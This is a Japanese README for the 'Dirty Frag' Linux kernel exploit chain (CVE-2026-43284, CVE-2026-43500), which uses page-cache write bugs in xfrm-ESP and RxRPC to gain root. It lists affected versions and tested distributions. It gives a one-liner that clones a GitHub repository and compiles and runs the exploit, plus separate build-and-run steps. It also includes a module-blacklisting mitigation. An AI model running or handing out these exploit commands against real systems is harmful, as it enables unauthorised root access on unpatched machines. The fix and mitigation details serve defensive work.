
Linuxカーネルのエクスプロイトチェーン(CVE-2026-43284 および CVE-2026-43500)。xfrm-ESP と RxRPC のページキャッシュ書き込み脆弱性を悪用して root 権限を取得します。
Linux CVE-2026-43284 & CVE-2026-43500
@V4bel よりコピー :) ありがとう :)
このドキュメントは、Hyunwoo Kim (@v4bel) によって最初に発見・報告された Dirty Frag 脆弱性クラスについて説明するもので、xfrm-ESP Page-Cache Write (CVE-2026-43284) 脆弱性と RxRPC Page-Cache Write (CVE-2026-43500) 脆弱性を連鎖させることで、主要な Linux ディストリビューションにおいて root 権限を取得できる。
Dirty Frag は、Dirty Pipe や Copy Fail が属するバグクラスを拡張した事例である。タイミングウィンドウに依存しない決定論的なロジックバグであるため、競合状態は不要で、エクスプロイトが失敗してもカーネルパニックは発生せず、成功率は非常に高い。
詳細な技術情報とタイムラインについては、こちらを参照。
xfrm-ESP Page-Cache Write (CVE-2026-43284) はメインライン f4c50a4034e6 で修正された。
RxRPC Page-Cache Write (CVE-2026-43500) はメインライン aa54b1d27fe0 で修正された。
エクスプロイト : 許可されたエンゲージメントでのみ実行すること !!
ワンライナー: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
ステップバイステップ :
まずエクスプロイトをコンパイルし、その後バイナリを実行する
gcc -O0 -Wall -o exp exp.c -lutil
./exp
!! クリーンアップ
⚠️ 重要: このエクスプロイトを実行すると、ページキャッシュが汚染される。汚染されたページキャッシュをクリアし、システムの安定性を確保するには、次のいずれかを実行すること:
echo 3 > /proc/sys/vm/drop_caches
またはシステムを再起動する。 影響を受けるバージョン
CVE-2026-43284: xfrm-ESP Page-Cache Write 脆弱性は cac2661c53f3 (2017-01-17) から f4c50a4034e6 (2026-05-05) までが対象範囲である。
CVE-2026-43500: RxRPC Page-Cache Write 脆弱性は 2dc334f1a63a (2023-06-08) から aa54b1d27fe0 (2026-05-10) までが対象範囲である。
言い換えれば、これらの脆弱性の実効的な存続期間は約 9 年である。
この Dirty Frag は、以下のディストリビューションバージョンでテストされている。
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...
緩和策
次のコマンドを使用して、脆弱性が発生するモジュールを削除し、ページキャッシュをクリアする。
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
各ディストリビューションがパッチをバックポートしたら、それに応じて更新すること。